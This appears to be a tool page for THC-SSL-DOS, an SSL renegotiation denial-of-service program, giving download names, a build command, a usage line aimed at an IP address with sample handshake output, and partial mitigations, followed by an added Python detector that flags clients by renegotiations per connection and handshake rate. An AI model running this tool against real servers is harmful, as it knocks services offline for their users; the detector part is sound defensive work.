This script acts on a security failure present in older (2003) versions of Apache. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. By exploiting this asymmetric property, the client sends thousands of renegotiation requests in the same TCP connection. When the server gets overloaded, it stops serving further requests. The attack is very cheap to execute in terms of hardware, as tests made with a single old machine showed.
Download:
Windows binary: thc-ssl-dos-1.4-win-bin.zip
Unix Source : thc-ssl-dos-1.4.tar.gz

Use "./configure; make all install" to build.

Usage:

    ./thc-ssl-dos 127.3.133.7 443
    Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
    Secure Renegotiation support: yes
    Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
    Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
    Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
    Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
    Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
    Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
    Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

No real solution exists. The following steps can mitigate (but not solve)
- Disable SSL-Renegotiation
- Install SSL Accelerator
Either of these countermeasures can be circumvented by modifying
THC-SSL-DOS. A better solution is desirable. Somebody should fix
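
Added example, not part of the original page or of the tool: a log-based detector for the handshake pattern described above, counting handshakes per TCP connection (anything after the first is a renegotiation) and the peak handshake rate per client address. The log format, the sample lines, the function names and both thresholds are assumptions made for the illustration.

```python
import re
from collections import Counter, defaultdict, deque

# Constructed sample, hypothetical log format: "<epoch_ms> <client_ip>:<port> handshake",
# one line per TLS handshake the server begins; ip:port identifies the TCP connection.
# 198.51.100.7 holds 100 connections and spreads roughly 80 handshakes/s across them,
# like the tool output above; 203.0.113.9 is an ordinary client.
SAMPLE_LOG = "\n".join(
    [f"{1_000_000 + i * 12} 198.51.100.7:{40000 + i % 100} handshake" for i in range(400)]
    + ["1000200 203.0.113.9:51000 handshake", "1000900 203.0.113.9:51001 handshake"]
)
LINE_RE = re.compile(r"^(\d+) (\S+):(\d+) handshake$")

def analyze(log_text, window_ms=1000):
    """Return (handshakes per connection, peak handshakes per client IP in any window)."""
    per_conn = Counter()
    recent = defaultdict(deque)   # client IP -> timestamps inside the sliding window
    peak = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue              # skip anything that is not a handshake event
        ts, ip, port = int(m.group(1)), m.group(2), m.group(3)
        per_conn[f"{ip}:{port}"] += 1
        q = recent[ip]            # assumes each client's events arrive in time order
        q.append(ts)
        while ts - q[0] >= window_ms:
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return per_conn, peak

def flag_clients(log_text, max_renegs_per_conn=1, max_rate_per_ip=20, window_ms=1000):
    """Report clients exceeding either limit (both limits are assumed values, tune per site)."""
    per_conn, peak = analyze(log_text, window_ms)
    reneg_conns = Counter()       # client IP -> connections with too many renegotiations
    for conn, n in per_conn.items():
        if n - 1 > max_renegs_per_conn:   # the first handshake is the initial one
            reneg_conns[conn.rsplit(":", 1)[0]] += 1
    return {ip: {"peak_rate": peak[ip], "reneg_conns": reneg_conns[ip]}
            for ip in peak
            if peak[ip] > max_rate_per_ip or reneg_conns[ip] > 0}

if __name__ == "__main__":
    print(flag_clients(SAMPLE_LOG))
```

The per-address rate is tracked alongside the per-connection count because, in the sample output above, each of the 100 connections carries less than one handshake per second while the client as a whole sustains about 80.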